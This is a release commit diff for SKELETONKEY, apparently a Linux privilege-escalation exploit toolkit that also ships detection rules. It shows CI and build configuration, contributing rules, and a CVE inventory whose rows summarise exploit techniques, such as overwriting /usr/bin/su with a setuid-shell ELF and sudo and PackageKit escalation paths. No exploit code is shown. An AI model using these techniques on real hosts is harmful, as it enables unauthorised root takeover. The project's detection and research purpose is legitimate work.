release v0.9.3: CVE metadata refresh (KEV 10→12) + dirtydecrypt bug fix

CVE metadata refresh: - Added 8 entries to core/cve_metadata.c for the v0.8.0 + v0.9.0 module CVEs. Two are CISA-KEV-listed: - CVE-2018-14634 mutagen_astronomy (2026-01-26, CWE-190) - CVE-2025-32463 sudo_chwoot (2025-09-29, CWE-829) - Populated via direct curl when refresh-cve-metadata.py's Python urlopen hung on CISA's HTTP/2 endpoint for ~55 min — same data, different transport. dirtydecrypt module bug fix: - dd_detect() was wrongly gating 'predates the bug' on kernel < 7.0 - Per NVD CVE-2026-31635: bug entered at 6.16.1 stable; vulnerable through 6.18.22 / 6.19.12 / 7.0-rc7; fixed at 6.18.23 / 6.19.13 / 7.0 - Fix: predates-gate now uses 6.16.1; patched_branches[] adds {6,18,23} - Re-verified: dirtydecrypt now correctly returns VULNERABLE on mainline 6.19.7 instead of OK. Previously a false negative on real vulnerable kernels. Footer goes from '10 in CISA KEV' to '12 in CISA KEV'. Verified count stays at 28 but dirtydecrypt's record is now a TRUE VULNERABLE match (was OK match).
docs: sweep stale counts to match v0.9.2 binary state
2026-05-24 01:17:58 -04:00 · 2026-05-24 00:09:21 -04:00 · 2026-05-24 00:03:35 -04:00 · 2026-05-23 23:38:55 -04:00 · 2026-05-23 23:35:02 -04:00 · 2026-05-23 22:36:02 -04:00
114 changed files with 19782 additions and 889 deletions
@@ -0,0 +1,24 @@
+# clang-tidy configuration for SKELETONKEY core/.
+#
+# Defaults are mostly fine. Two checks intentionally disabled:
+#
+#   clang-analyzer-security.insecureAPI.DeprecatedOrUnsafeBufferHandling
+#     This check flags snprintf, fprintf, memset, strncpy, etc. as
+#     "insecure" and recommends the C11 Annex K _s variants
+#     (snprintf_s, memset_s, ...). Annex K is fundamentally not
+#     portable — glibc, musl, and MSVC all either don't implement
+#     it or implement it incompletely. snprintf is already bounds-
+#     checked; this is noise rather than signal in real C code.
+#     The Linux kernel uses these functions everywhere; so does
+#     every C project. Disabling.
+#
+#   bugprone-easily-swappable-parameters
+#     Flags every function taking 2+ same-typed parameters. False-
+#     positive heavy on small utility functions like
+#     skeletonkey_host_kernel_at_least(host, major, minor, patch)
+#     where the parameter order is documented and obvious. Not
+#     worth the noise.
+
+Checks: >
+  -clang-analyzer-security.insecureAPI.DeprecatedOrUnsafeBufferHandling,
+  -bugprone-easily-swappable-parameters
@@ -5,6 +5,11 @@ on:
    branches: [main]
  pull_request:
    branches: [main]
+  schedule:
+    # Weekly drift check against CISA KEV + Debian security tracker.
+    # Runs Monday 06:00 UTC; reports any new backports / KEV additions
+    # that haven't propagated into the corpus yet.
+    - cron: '0 6 * * 1'

 jobs:
  build:
@@ -22,7 +27,8 @@ jobs:
        run: |
          sudo apt-get update -qq
          sudo apt-get install -y --no-install-recommends \
-            build-essential clang make linux-libc-dev
+            build-essential clang make linux-libc-dev \
+            libglib2.0-dev pkg-config

      - name: show compiler
        run: ${{ matrix.cc }} --version
@@ -54,6 +60,103 @@ jobs:
      - name: sanity — --detect-rules sigma
        run: ./skeletonkey --detect-rules --format=sigma | head -50

+      - name: tests — detect() unit suite
+        env:
+          CC: ${{ matrix.cc }}
+        run: |
+          # Run as a non-root user so modules' "already root" gates do
+          # not short-circuit before the synthetic host-fingerprint
+          # checks fire. The test binary itself is platform-agnostic;
+          # the assertions are #ifdef __linux__ guarded.
+          sudo useradd -m -s /bin/bash skeletonkeyci 2>/dev/null || true
+          sudo chown -R skeletonkeyci .
+          sudo -u skeletonkeyci make test
+
+  # ASan + UBSan run. clang-only; catches memory bugs and undefined
+  # behaviour the regular test suite can't see. Runs on the same 88
+  # tests as the main matrix; failures here are real bugs even if
+  # the assertions all pass.
+  sanitizers:
+    runs-on: ubuntu-latest
+    name: sanitizers (ASan + UBSan)
+    steps:
+      - uses: actions/checkout@v4
+      - name: install deps
+        run: |
+          sudo apt-get update -qq
+          sudo apt-get install -y --no-install-recommends \
+            build-essential clang make linux-libc-dev \
+            libglib2.0-dev pkg-config sudo
+      - name: build + test under sanitizers
+        env:
+          CC: clang
+          # AddressSanitizer + UndefinedBehaviorSanitizer. -O1 keeps
+          # backtraces meaningful while still exercising optimizer paths;
+          # -fno-omit-frame-pointer for ASan stack traces; halt-on-error
+          # so the first finding fails CI loudly rather than scrolling
+          # past silently.
+          CFLAGS: "-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined -fno-sanitize-recover=all -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64"
+          LDFLAGS: "-fsanitize=address,undefined"
+        run: |
+          sudo useradd -m -s /bin/bash skeletonkeyci 2>/dev/null || true
+          sudo chown -R skeletonkeyci .
+          sudo -u skeletonkeyci -E make test
+
+  # clang-tidy lint. Runs against core/ + skeletonkey.c (the files we
+  # control most tightly). Non-blocking for now — sets a baseline we
+  # can tighten incrementally. Module sources are excluded; many
+  # bundle published PoC code that we keep close to upstream style.
+  clang-tidy:
+    runs-on: ubuntu-latest
+    name: clang-tidy
+    continue-on-error: true
+    steps:
+      - uses: actions/checkout@v4
+      - name: install deps
+        run: |
+          sudo apt-get update -qq
+          sudo apt-get install -y --no-install-recommends \
+            clang clang-tidy linux-libc-dev libglib2.0-dev pkg-config
+      - name: lint core + dispatcher
+        run: |
+          clang-tidy core/*.c skeletonkey.c \
+            --warnings-as-errors='' \
+            -- -Icore -Imodules/copy_fail_family/src \
+               -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64
+
+  # Drift check — runs the two refresh scripts in --check / drift mode
+  # against authoritative federal sources. Catches:
+  #   - New CISA KEV additions touching CVEs in our corpus
+  #   - New Debian security-tracker backport-version updates that move
+  #     the kernel_patched_from table thresholds
+  # Network-required (fetches kev.csv + Debian tracker JSON). Runs on
+  # the weekly cron + on-demand via workflow_dispatch. NOT gated on
+  # PRs because random PRs shouldn't fail on upstream feed drift.
+  drift-check:
+    if: github.event_name == 'schedule' || github.event_name == 'workflow_dispatch'
+    runs-on: ubuntu-latest
+    name: drift-check (CISA KEV + Debian tracker)
+    steps:
+      - uses: actions/checkout@v4
+      - name: cve_metadata drift
+        run: |
+          # Exits 1 if the federal data has drifted from our committed
+          # JSON. Open a PR with `tools/refresh-cve-metadata.py` output
+          # if this fires.
+          python3 tools/refresh-cve-metadata.py --check || {
+            echo "::warning::cve_metadata drift detected — run tools/refresh-cve-metadata.py and commit the result"
+            exit 1
+          }
+      - name: kernel_range drift
+        run: |
+          # Exits 1 if any module's kernel_patched_from table is
+          # MISSING or TOO_TIGHT versus Debian's tracker. INFO-only
+          # findings are fine.
+          python3 tools/refresh-kernel-ranges.py || {
+            echo "::warning::kernel_range drift detected — see tools/refresh-kernel-ranges.py output"
+            exit 1
+          }
+
  # Static build job: ensures the project links cleanly when -static is
  # requested. Useful for deployment to minimal containers / fleet scans
  # where shared-libc availability isn't guaranteed.
@@ -66,7 +169,8 @@ jobs:
        run: |
          sudo apt-get update -qq
          sudo apt-get install -y --no-install-recommends \
-            build-essential make linux-libc-dev libc6-dev
+            build-essential make linux-libc-dev libc6-dev \
+            libglib2.0-dev pkg-config
      - name: make static
        # Glibc static linking pulls in NSS at runtime which breaks
        # getpwnam; the legacy DIRTYFAIL Makefile noted this. For now,
@@ -59,8 +59,86 @@ jobs:
            skeletonkey-${{ matrix.target }}
            skeletonkey-${{ matrix.target }}.sha256

+  # Portable static-musl x86_64 build. Runs in Alpine (native musl +
+  # linux-headers) so the resulting binary works on every libc —
+  # glibc 2.x of any version, musl, etc. This is what install.sh
+  # fetches by default for x86_64 hosts (the dynamic binary above
+  # hits a glibc-version ceiling on older distros like Debian 12 /
+  # RHEL 8).
+  build-static-x86_64:
+    runs-on: ubuntu-latest
+    name: build (x86_64-static / musl)
+    container:
+      image: alpine:latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: install build deps
+        run: apk add --no-cache build-base linux-headers tar
+      - name: build static (musl)
+        run: |
+          # MSG_COPY is a Linux-only SysV msg flag that glibc defines
+          # but musl does not — netfilter_xtcompat needs it. Define
+          # the kernel constant explicitly. (Kernel: include/uapi/
+          # linux/msg.h: MSG_COPY = 040000)
+          make CFLAGS="-O2 -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -DMSG_COPY=040000" LDFLAGS=-static
+          file skeletonkey
+          ls -la skeletonkey
+      - name: rename + checksum
+        run: |
+          mv skeletonkey skeletonkey-x86_64-static
+          sha256sum skeletonkey-x86_64-static > skeletonkey-x86_64-static.sha256
+      - uses: actions/upload-artifact@v4
+        with:
+          name: skeletonkey-x86_64-static
+          path: |
+            skeletonkey-x86_64-static
+            skeletonkey-x86_64-static.sha256
+
+  # Portable static-musl arm64 build. Cross-compile from the x86_64
+  # runner using dockcross/linux-arm64-musl — a Debian-based cross
+  # toolchain image that ships aarch64-linux-musl-gcc with a clean
+  # musl sysroot + Linux uapi headers. Avoids the two prior failure
+  # modes:
+  #   (1) Alpine on arm64: actions/checkout JS bundle requires glibc-
+  #       compatible Node, which GitHub doesn't inject on arm64.
+  #   (2) musl-tools on ubuntu-24.04-arm: musl-gcc + Ubuntu's
+  #       /usr/include collide (glibc stdio.h vs musl stdio.h →
+  #       __gnuc_va_list / __time64_t conflicts).
+  # dockcross runs glibc Debian (so checkout works), invokes a
+  # bundled aarch64-linux-musl-gcc whose sysroot has its own
+  # consistent musl + linux-uapi tree.
+  build-static-arm64:
+    runs-on: ubuntu-latest
+    name: build (arm64-static / musl)
+    steps:
+      - uses: actions/checkout@v4
+      - name: run dockcross arm64-musl build
+        run: |
+          # Fetch the dockcross wrapper script (handles UID/GID,
+          # volume mounts, env passing). Image already has
+          # aarch64-linux-musl-gcc on PATH.
+          docker run --rm dockcross/linux-arm64-musl > ./dockcross
+          chmod +x ./dockcross
+          ./dockcross bash -c '
+            make CC=aarch64-linux-musl-gcc \
+                 CFLAGS="-O2 -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -DMSG_COPY=040000" \
+                 LDFLAGS=-static
+          '
+          file skeletonkey
+          ls -la skeletonkey
+      - name: rename + checksum
+        run: |
+          mv skeletonkey skeletonkey-arm64-static
+          sha256sum skeletonkey-arm64-static > skeletonkey-arm64-static.sha256
+      - uses: actions/upload-artifact@v4
+        with:
+          name: skeletonkey-arm64-static
+          path: |
+            skeletonkey-arm64-static
+            skeletonkey-arm64-static.sha256
+
  release:
-    needs: build
+    needs: [build, build-static-x86_64, build-static-arm64]
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
@@ -79,31 +157,28 @@ jobs:
        run: |
          tag="${GITHUB_REF#refs/tags/}"
          echo "tag=$tag" >> "$GITHUB_OUTPUT"
-          # Pull the latest entry from CVES.md / ROADMAP.md for the body
+          # Prefer the hand-written release notes if present (richer
+          # per-release context); otherwise fall back to an auto-generated
+          # stub with install instructions + pointers to docs.
+          if [ -f docs/RELEASE_NOTES.md ]; then
+            cp docs/RELEASE_NOTES.md release-notes.md
+          else
            {
              echo "## SKELETONKEY $tag"
              echo
-            echo "Pre-built binaries for x86_64 and arm64. Checksums alongside."
+              echo "Pre-built binaries for x86_64 (dynamic + static-musl) and arm64."
+              echo "Checksums alongside each artifact."
              echo
              echo "### Install"
-            echo
              echo '```bash'
-            echo "curl -sSLfo /tmp/skeletonkey https://github.com/${GITHUB_REPOSITORY}/releases/download/${tag}/skeletonkey-\$(uname -m | sed s/aarch64/arm64/)"
-            echo "chmod +x /tmp/skeletonkey && sudo mv /tmp/skeletonkey /usr/local/bin/skeletonkey"
+              echo "curl -sSL https://github.com/${GITHUB_REPOSITORY}/releases/download/${tag}/install.sh | sh"
              echo "skeletonkey --version"
              echo '```'
              echo
-            echo "Or one-shot via the install script:"
-            echo
-            echo '```bash'
-            echo "curl -sSL https://github.com/${GITHUB_REPOSITORY}/releases/download/${tag}/install.sh | sh"
-            echo '```'
-            echo
-            echo "### What's in this release"
-            echo
-            echo "See [\`CVES.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/CVES.md) for the curated CVE inventory."
-            echo "See [\`ROADMAP.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/ROADMAP.md) for phase progress."
+              echo "See [\`CVES.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/CVES.md) for the CVE inventory."
+              echo "See [\`docs/RELEASE_NOTES.md\`](https://github.com/${GITHUB_REPOSITORY}/blob/${tag}/docs/RELEASE_NOTES.md) for per-release detail."
            } > release-notes.md
+          fi

      - name: publish release
        uses: softprops/action-gh-release@v2
@@ -114,7 +189,11 @@ jobs:
          files: |
            skeletonkey-x86_64
            skeletonkey-x86_64.sha256
+            skeletonkey-x86_64-static
+            skeletonkey-x86_64-static.sha256
            skeletonkey-arm64
            skeletonkey-arm64.sha256
+            skeletonkey-arm64-static
+            skeletonkey-arm64-static.sha256
            install.sh
          fail_on_unmatched_files: false   # install.sh may not exist at first tag
@@ -6,6 +6,17 @@ build/
 modules/*/build/
 modules/*/dirtyfail
 modules/*/skeletonkey
+/skeletonkey
+/skeletonkey-test
+/skeletonkey-test-kr
+/skeletonkey-x86_64
+/skeletonkey-x86_64-static
+/skeletonkey-x86_64.sha256
+/skeletonkey-x86_64-static.sha256
+/skeletonkey-arm64
+/skeletonkey-arm64.sha256
 .vscode/
 .idea/
 *.swp
+/tools/verify-vm/logs/
+/tools/verify-vm/.vagrant/
@@ -0,0 +1,89 @@
+# Contributing to SKELETONKEY
+
+SKELETONKEY is a curated corpus. PRs welcome for the things below.
+For everything else, open an issue first to discuss scope.
+
+## What we accept
+
+### 1. Kernel offsets for the `--full-chain` table
+
+The 11 🟡 PRIMITIVE modules use the shared finisher in
+`core/finisher.c` to convert their primitive into a root pop via
+`modprobe_path` overwrite. That needs `&modprobe_path` (and friends)
+at runtime — resolved via env vars / `/proc/kallsyms` /
+`/boot/System.map` / the embedded `kernel_table[]` in
+`core/offsets.c`.
+
+The embedded table is **empty by default** to honor the
+no-fabricated-offsets rule. Every entry must come from a real kernel
+you have root on.
+
+**Workflow:**
+
+```bash
+sudo skeletonkey --dump-offsets   # on the target kernel build
+# Paste the printed C struct entry into core/offsets.c kernel_table[]
+# Open a PR titled "offsets: <distro> <kernel_release>"
+```
+
+Include in the PR body:
+- Distro + kernel version (`uname -a`, `cat /etc/os-release`)
+- How you verified the offsets (kallsyms / System.map / debuginfo)
+- Whether `--full-chain` succeeds end-to-end against any 🟡 module
+  on that kernel (if you can test on a vulnerable build)
+
+### 2. New modules
+
+A new CVE module is welcome if:
+
+- The bug is **patched in upstream mainline** (no 0days here)
+- It has a public CVE assignment or clear advisory
+- The kernel range it affects has realistic deployment footprint
+- You can include a working detect() with branch-backport ranges
+- You ship matching detection rules (auditd at minimum)
+
+Use any existing module as a template. Lightest-weight reference:
+`modules/ptrace_traceme_cve_2019_13272/skeletonkey_modules.c`.
+
+Mandatory:
+- Detect short-circuits cleanly on patched kernels (we test this)
+- `--i-know` gate on exploit
+- Honest scope: `SKELETONKEY_EXPLOIT_OK` only after empirical root,
+  otherwise `EXPLOIT_FAIL` with diagnostic
+- `NOTICE.md` crediting the original CVE reporter + PoC author
+
+After the module file exists, wire it into:
+- `core/registry.h` (extern declaration)
+- `skeletonkey.c` main() (register call)
+- `Makefile` (new objects + ALL_OBJS)
+- `CVES.md` (inventory entry)
+
+### 3. Detection rules
+
+If you're adding only detection coverage (no exploit) for an
+existing or new CVE, that's fine. Drop a sigma rule into the module
+or a new auditd rule file.
+
+### 4. Bug reports + CVE-status corrections
+
+Distro backports that patched a CVE without bumping the upstream
+version → file an issue. Same for kernels we mis-classify as
+vulnerable.
+
+## What we don't accept
+
+- Untested code paths claiming `SKELETONKEY_EXPLOIT_OK`
+- Per-kernel offsets fabricated without verification
+- Modules without detection rules
+- 0day disclosures (responsible disclosure first; bundle here
+  after upstream patch ships)
+- Container escapes that don't chain to host root
+
+## Code style
+
+C99. Match the surrounding file. Run `make` and the existing
+CI build (`.github/workflows/build.yml`) before opening the PR.
+
+## License
+
+By contributing you agree your work is MIT-licensed.
@@ -23,7 +23,34 @@ Status legend:
 - 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
  historical reference only

-**Counts (v0.3.1):** 🟢 13 · 🟡 11 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
+**Counts:** 39 modules total covering 34 CVEs; **28 of 34 CVEs
+verified end-to-end in real VMs** via `tools/verify-vm/`. 🔵 0 · ⚪ 0
+planned-with-stub · 🔴 0. (One ⚪ row below — CVE-2026-31402 — is a
+*candidate* with no module, not counted as a module.)
+
+> **Note on unverified rows:** `vmwgfx` / `dirty_cow` /
+> `mutagen_astronomy` / `pintheft` / `vsock_uaf` / `fragnesia` are
+> blocked by their target environment (VMware-only, kernel < 4.4,
+> mainline panic, kmod not autoloaded, or t64-transition libs),
+> not by missing code. See
+> [`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml).
+>
+> All three now have **pinned fix commits and version-based
+> `detect()`**:
+> - `pack2theroot` reads PackageKit's `VersionMajor/Minor/Micro` over
+>   D-Bus and compares against fix release **1.3.5** (commit `76cfb675`).
+> - `dirtydecrypt` uses the `kernel_range` model against mainline fix
+>   **`a2567217`** (Linux 7.0); kernels < 7.0 predate the vulnerable
+>   rxgk code per Debian's tracker.
+> - `fragnesia` uses `kernel_range` against mainline **7.0.9**; older
+>   Debian-stable branches (5.10/6.1/6.12) are still listed vulnerable
+>   on Debian's tracker — backport entries will extend the table as
+>   distros publish them.
+>
+> `--auto` auto-enables active probes (forked per module so a probe
+> crash cannot tear down the scan), which lets all three give an
+> empirical confirmation on top of the version verdict. See each
+> module's `MODULE.md`.

 Every module ships a `NOTICE.md` crediting the original CVE
 reporter and PoC author. `skeletonkey --dump-offsets` populates the
@@ -59,7 +86,13 @@ root on a host can upstream their kernel's offsets via PR.
 | CVE-2023-4622 | AF_UNIX garbage-collector race UAF | LPE (slab UAF, plain unprivileged) | mainline 6.6-rc1 (Aug 2023) | `af_unix_gc` | 🟡 | Lin Ma. Two-thread race driver: SCM_RIGHTS cycle vs unix_gc trigger; kmalloc-512 (SLAB_TYPESAFE_BY_RCU) refill via msg_msg. **Widest deployment of any module — bug exists since 2.x.** No userns required. Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51 / 6.5.0. |
 | CVE-2022-25636 | nft_fwd_dup_netdev_offload heap OOB | LPE (kernel R/W via offload action[] OOB) | mainline 5.17 / 5.16.11 (Feb 2022) | `nft_fwd_dup` | 🟡 | Aaron Adams (NCC). NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd writes past action.entries[1]. msg_msg kmalloc-512 spray. Branch backports: 5.4.181 / 5.10.102 / 5.15.25 / 5.16.11. |
 | CVE-2023-0179 | nft_payload set-id memory corruption | LPE (regs->data[] OOB R/W) | mainline 6.2-rc4 / 6.1.6 (Jan 2023) | `nft_payload` | 🟡 | Davide Ornaghi. NFTA_SET_DESC variable-length element + NFTA_SET_ELEM_EXPRESSIONS payload-set whose verdict.code drives the OOB. Dual cg-96 + 1k spray. Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 / 5.15.88 / 6.1.6. |
-| CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |
+| CVE-2021-3156 | sudo Baron Samedit — `sudoedit -s` heap overflow | LPE (userspace setuid sudo) | sudo 1.9.5p2 (Jan 2021) | `sudo_samedit` | 🟡 | Qualys Baron Samedit. Heap overflow via `sudoedit -s '\'` escaped-backslash parsing. Affects sudo 1.8.2 ≤ V ≤ 1.9.5p1. Heap-tuned exploit — may crash sudo on a mismatched layout. Ships auditd + sigma rules. |
+| CVE-2021-33909 | Sequoia — `seq_file` size_t overflow → kernel stack OOB | LPE (kernel stack OOB write) | mainline 5.13.4 / 5.10.52 / 5.4.134 (Jul 2021) | `sequoia` | 🟡 | Qualys Sequoia. `size_t`-to-`int` conversion in `seq_file` drives an OOB write off the kernel stack via a deeply-nested directory mount. Primitive-only — fires the overflow + records a witness; no portable cred chain. Branch backports: 5.13.4 / 5.10.52 / 5.4.134. Ships auditd rule. |
+| CVE-2023-22809 | sudoedit `EDITOR`/`VISUAL` `--` argv escape | LPE (userspace setuid sudoedit) | sudo 1.9.12p2 (Jan 2023) | `sudoedit_editor` | 🟢 | Structural argv-injection — an extra `--` in `EDITOR`/`VISUAL` makes setuid `sudoedit` open an attacker-chosen file as root. No kernel state, no offsets, no race. Affects sudo 1.8.0 ≤ V < 1.9.12p2. Ships auditd + sigma rules. |
+| CVE-2023-2008 | vmwgfx DRM buffer-object size-validation OOB | LPE (kernel R/W via kmalloc-512 OOB) | mainline 6.3-rc6 (Apr 2023) | `vmwgfx` | 🟡 | vmwgfx DRM `bo` size-validation gap → OOB write in kmalloc-512. Affects 4.0 ≤ K < 6.3-rc6 on hosts with the `vmwgfx` module loaded (VMware guests). Primitive-only — fires the OOB + slab witness; no cred chain. Branch backports: 6.2.10 / 6.1.23. Ships auditd rule. |
+| CVE-2026-31635 | DirtyDecrypt / DirtyCBC — rxgk missing-COW in-place decrypt | LPE (page-cache write into a setuid binary) | mainline Linux 7.0 (commit `a2567217ade970ecc458144b6be469bc015b23e5`) | `dirtydecrypt` | 🟡 | **Ported from the public V12 PoC, exploit body not yet VM-verified.** Sibling of Copy Fail / Dirty Frag in the rxgk (AFS rxrpc encryption) subsystem. `fire()` sliding-window page-cache write, ~256 fires/byte; rewrites the first 120 bytes of `/usr/bin/su` with a setuid-shell ELF. detect() is version-pinned: kernels < 7.0 predate the vulnerable rxgk code (Debian: `<not-affected, vulnerable code not present>` for 5.10/6.1/6.12); kernels ≥ 7.0 have the fix. `--active` probe fires the primitive at a `/tmp` sentinel for empirical override. x86_64. |
+| CVE-2026-46300 | Fragnesia — XFRM ESP-in-TCP `skb_try_coalesce` SHARED_FRAG loss | LPE (page-cache write into a setuid binary) | mainline 7.0.9; older Debian-stable branches still unfixed as of 2026-05-22 | `fragnesia` | 🟡 | **Ported from the public V12 PoC, exploit body not yet VM-verified.** Latent bug exposed by the Dirty Frag fix (`f4c50a4034e6`). AF_ALG GCM keystream table + userns/netns + XFRM ESP-in-TCP splice trigger pair; rewrites the first 192 bytes of `/usr/bin/su`. Needs `CONFIG_INET_ESPINTCP` + unprivileged userns (the in-scope question the old `_stubs/fragnesia_TBD` raised — resolved: ships, reports PRECOND_FAIL when the userns gate is closed). detect() is version-pinned at 7.0.9; older branches that haven't backported yet are flagged VULNERABLE on the version check (override empirically via `--active`). PoC's ANSI TUI dropped in the port. x86_64. |
+| CVE-2026-41651 | Pack2TheRoot — PackageKit `InstallFiles` TOCTOU | LPE (userspace D-Bus daemon → `.deb` postinst as root) | PackageKit 1.3.5 (commit `76cfb675`, 2026-04-22) | `pack2theroot` | 🟡 | **Ported from the public Vozec PoC, not yet VM-verified.** Two back-to-back `InstallFiles` D-Bus calls — first `SIMULATE` (polkit bypass + queues a GLib idle), then immediately `NONE` + malicious `.deb` (overwrites the cached flags before the idle fires). GLib priority ordering makes the overwrite deterministic, not a race. Disclosure by **Deutsche Telekom security**. Affects PackageKit 1.0.2 → 1.3.4 — default-enabled on Ubuntu Desktop, Debian, Fedora, Rocky/RHEL via Cockpit. `detect()` reads `VersionMajor/Minor/Micro` over D-Bus → high-confidence verdict (vs. precondition-only for dirtydecrypt/fragnesia). Debian-family only (PoC's built-in `.deb` builder). Needs `libglib2.0-dev` at build time; Makefile autodetects via `pkg-config gio-2.0` and falls through to a stub when absent. |

 ## Operations supported per module

@@ -91,6 +124,13 @@ Symbols: ✓ = supported, — = not applicable / no automated path.
 | af_unix_gc | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
 | nft_fwd_dup | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
 | nft_payload | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
+| sudo_samedit | ✓ | ✓ (primitive) | — (upgrade sudo) | ✓ (crumb nuke) | ✓ (auditd + sigma) |
+| sequoia | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (nested-tree + mount teardown) | ✓ (auditd) |
+| sudoedit_editor | ✓ | ✓ | — (upgrade sudo) | ✓ (revert written file) | ✓ (auditd + sigma) |
+| vmwgfx | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (log unlink) | ✓ (auditd) |
+| dirtydecrypt | ✓ (+ `--active`) | ✓ (ported) | — (upgrade kernel) | ✓ (evict page cache) | ✓ (auditd + sigma) |
+| fragnesia | ✓ (+ `--active`) | ✓ (ported) | — (upgrade kernel) | ✓ (evict page cache) | ✓ (auditd + sigma) |
+| pack2theroot | ✓ (PK version via D-Bus) | ✓ (ported) | — (upgrade PackageKit ≥ 1.3.5) | ✓ (rm /tmp + `dpkg -r`) | ✓ (auditd + sigma) |

 ## Pipeline for additions

@@ -20,9 +20,15 @@ BUILD   := build
 BIN     := skeletonkey

 # core/
-CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c
+CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c \
+             core/host.c core/cve_metadata.c core/verifications.c
 CORE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CORE_SRCS))

+# Register-every-module helper. Lives in its own translation unit so
+# the kernel_range unit-test binary can link just CORE_OBJS without
+# pulling in every module symbol via registry_all.o.
+REGISTRY_ALL_OBJ := $(BUILD)/core/registry_all.o
+
 # Family: copy_fail_family
 # All DIRTYFAIL .c files contribute; skeletonkey_modules.c is the bridge.
 CFF_DIR  := modules/copy_fail_family
@@ -126,17 +132,150 @@ NPL_DIR  := modules/nft_payload_cve_2023_0179
 NPL_SRCS := $(NPL_DIR)/skeletonkey_modules.c
 NPL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NPL_SRCS))

+SAM_DIR  := modules/sudo_samedit_cve_2021_3156
+SAM_SRCS := $(SAM_DIR)/skeletonkey_modules.c
+SAM_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SAM_SRCS))
+
+SEQ_DIR  := modules/sequoia_cve_2021_33909
+SEQ_SRCS := $(SEQ_DIR)/skeletonkey_modules.c
+SEQ_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SEQ_SRCS))
+
+SUE_DIR  := modules/sudoedit_editor_cve_2023_22809
+SUE_SRCS := $(SUE_DIR)/skeletonkey_modules.c
+SUE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SUE_SRCS))
+
+VMW_DIR  := modules/vmwgfx_cve_2023_2008
+VMW_SRCS := $(VMW_DIR)/skeletonkey_modules.c
+VMW_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(VMW_SRCS))
+
+# Family: dirtydecrypt (CVE-2026-31635) — rxgk page-cache write
+DDC_DIR  := modules/dirtydecrypt_cve_2026_31635
+DDC_SRCS := $(DDC_DIR)/skeletonkey_modules.c
+DDC_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(DDC_SRCS))
+
+# Family: fragnesia (CVE-2026-46300) — XFRM ESP-in-TCP page-cache write
+FGN_DIR  := modules/fragnesia_cve_2026_46300
+FGN_SRCS := $(FGN_DIR)/skeletonkey_modules.c
+FGN_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(FGN_SRCS))
+
+# Family: pack2theroot (CVE-2026-41651) — PackageKit TOCTOU userspace LPE.
+# Needs GLib/GIO for D-Bus; the build autodetects via `pkg-config gio-2.0`.
+# When absent (e.g. no libglib2.0-dev on the build host), the module
+# compiles as a stub that returns PRECOND_FAIL with a hint to install
+# the dev package and rebuild.
+P2TR_DIR  := modules/pack2theroot_cve_2026_41651
+P2TR_SRCS := $(P2TR_DIR)/skeletonkey_modules.c
+P2TR_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(P2TR_SRCS))
+
+P2TR_GIO_OK := $(shell pkg-config --exists gio-2.0 2>/dev/null && echo 1 || echo 0)
+ifeq ($(P2TR_GIO_OK),1)
+  P2TR_CFLAGS := $(shell pkg-config --cflags gio-2.0) -DPACK2TR_HAVE_GIO
+  P2TR_LIBS   := $(shell pkg-config --libs gio-2.0)
+else
+  P2TR_CFLAGS :=
+  P2TR_LIBS   :=
+endif
+
+# Per-object CFLAGS for the pack2theroot translation unit (GLib include
+# paths). Target-specific vars are scoped to this object's recipe.
+$(P2TR_OBJS): CFLAGS += $(P2TR_CFLAGS)
+
+# Family: sudo_chwoot (CVE-2025-32463) — sudo --chroot NSS injection
+SCHW_DIR  := modules/sudo_chwoot_cve_2025_32463
+SCHW_SRCS := $(SCHW_DIR)/skeletonkey_modules.c
+SCHW_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SCHW_SRCS))
+
+# Family: udisks_libblockdev (CVE-2025-6019) — SUID-on-mount via polkit allow_active
+UDB_DIR  := modules/udisks_libblockdev_cve_2025_6019
+UDB_SRCS := $(UDB_DIR)/skeletonkey_modules.c
+UDB_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(UDB_SRCS))
+
+# Family: pintheft (CVE-2026-43494) — RDS zerocopy double-free (V12 Security)
+PTH_DIR  := modules/pintheft_cve_2026_43494
+PTH_SRCS := $(PTH_DIR)/skeletonkey_modules.c
+PTH_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(PTH_SRCS))
+
